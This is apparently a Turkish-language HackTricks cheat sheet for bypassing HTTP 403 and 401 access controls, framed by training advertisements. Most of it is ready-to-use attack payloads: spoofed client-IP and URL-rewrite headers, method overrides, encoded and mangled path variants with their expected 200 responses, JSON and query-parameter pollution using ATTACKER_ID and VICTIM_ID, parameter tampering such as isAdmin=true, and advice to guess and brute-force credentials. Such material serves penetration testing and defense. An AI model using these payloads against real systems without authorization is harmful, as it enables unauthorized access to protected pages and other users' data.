403 & 401 Bypasses
Last updated
Last updated
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)
Web uygulamalarınız, ağınız ve bulutunuz hakkında bir hacker perspektifi edinin
Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açıklarını bulun ve raporlayın. Saldırı yüzeyini haritalamak, ayrıcalıkları artırmanıza izin veren güvenlik sorunlarını bulmak ve temel kanıtları toplamak için otomatik istismarları kullanmak için 20'den fazla özel aracımızı kullanın, böylece sıkı çalışmanızı ikna edici raporlara dönüştürün.
Dosyaya erişmek için farklı fiiller kullanmayı deneyin: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Yanıt başlıklarını kontrol edin, belki bazı bilgiler verilebilir. Örneğin, HEAD için 200 yanıtı ve Content-Length: 55
demek ki HEAD fiili bilgiye erişebilir. Ama yine de o bilgiyi dışarı çıkarmanın bir yolunu bulmalısınız.
X-HTTP-Method-Override: PUT
gibi bir HTTP başlığı kullanmak fiili geçersiz kılabilir.
TRACE
fiilini kullanın ve çok şanslıysanız belki yanıt içinde ara proxy'ler tarafından eklenen başlıkları görebilirsiniz, bu da faydalı olabilir.
Host başlığını rastgele bir değere değiştirin (burada işe yaradı)
Kaynağa erişmek için diğer Kullanıcı Araçlarını kullanmayı deneyin.
HTTP Başlıklarını Fuzzing: HTTP Proxy Başlıkları, HTTP Kimlik Doğrulama Temel ve NTLM brute-force (sadece birkaç kombinasyon ile) ve diğer teknikleri deneyin. Bunu yapmak için fuzzhttpbypass aracını oluşturdum.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
Eğer yol korunuyorsa bu diğer başlıkları kullanarak yol korumasını aşmayı deneyebilirsiniz:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Eğer sayfa bir proxy'nin arkasındaysa, belki de proxy özel bilgilere erişmenizi engelliyordur. HTTP İstek Kaçırma veya hop-by-hop başlıkları** istismar etmeyi deneyin.**
Farklı yanıtlar aramak için özel HTTP başlıklarını fuzzing yapın.
HTTP Yöntemlerini fuzzing yaparken özel HTTP başlıklarını fuzzing yapın.
Host başlığını kaldırın ve belki de korumayı aşabileceksiniz.
Eğer /path engellenmişse:
/%2e/path _kullanmayı deneyin (eğer erişim bir proxy tarafından engelleniyorsa, bu korumayı aşabilir). Ayrıca_** /%252e**/path (çift URL kodlama) deneyin.
Unicode bypass deneyin: /%ef%bc%8fpath (URL kodlu karakterler "/" gibidir) böylece geri kodlandığında //path olacak ve belki de /path adı kontrolünü zaten aşmış olacaksınız.
Diğer yol bypass'leri:
site.com/secret –> HTTP 403 Yasak
site.com/SECRET –> HTTP 200 Tamam
site.com/secret/ –> HTTP 200 Tamam
site.com/secret/. –> HTTP 200 Tamam
site.com//secret// –> HTTP 200 Tamam
site.com/./secret/.. –> HTTP 200 Tamam
site.com/;/secret –> HTTP 200 Tamam
site.com/.;/secret –> HTTP 200 Tamam
site.com//;//secret –> HTTP 200 Tamam
site.com/secret.json –> HTTP 200 Tamam (ruby)
Aşağıdaki durumlarda bu listeyi kullanın:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
Diğer API bypass'leri:
/v3/users_data/1234 --> 403 Yasak
/v1/users_data/1234 --> 200 Tamam
{“id”:111} --> 401 Yetkisiz
{“id”:[111]} --> 200 Tamam
{“id”:111} --> 401 Yetkisiz
{“id”:{“id”:111}} --> 200 Tamam
{"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parametre Kirliliği)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Parametre Kirliliği)
param değerini değiştirin: id=123
--> id=124
URL'ye ek parametreler ekleyin: ?
id=124
—-> id=124&isAdmin=true
Parametreleri kaldırın
Parametreleri yeniden sıralayın
Özel karakterler kullanın.
Parametrelerde sınır testi yapın — -234 veya 0 veya 99999999 gibi değerler sağlayın (sadece bazı örnek değerler).
HTTP/1.1 kullanıyorsanız 1.0 kullanmayı deneyin veya 2.0'ı destekleyip desteklemediğini test edin.
Alan adının IP veya CNAME'sini alın ve doğrudan iletişim kurmayı deneyin.
Sunucuyu zorlayın yaygın GET istekleri göndererek (Bu adam için Facebook'ta işe yaradı).
Protokolü değiştirin: http'den https'ye veya https'den http'ye.
https://archive.org/web/ adresine gidin ve geçmişte o dosyanın dünya çapında erişilebilir olup olmadığını kontrol edin.
Şifreyi tahmin edin: Aşağıdaki yaygın kimlik bilgilerini test edin. Kurban hakkında bir şey biliyor musunuz? Ya da CTF meydan okuma adını mı?
Brute force: Temel, digest ve NTLM kimlik doğrulamasını deneyin.
Web uygulamalarınız, ağınız ve bulutunuz hakkında bir hacker perspektifi edinin
Gerçek iş etkisi olan kritik, istismar edilebilir güvenlik açıklarını bulun ve raporlayın. Saldırı yüzeyini haritalamak, yetki yükseltmenize izin veren güvenlik sorunlarını bulmak ve temel kanıtları toplamak için otomatik istismarları kullanarak, 20'den fazla özel aracımızı kullanın ve sıkı çalışmanızı ikna edici raporlara dönüştürün.
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)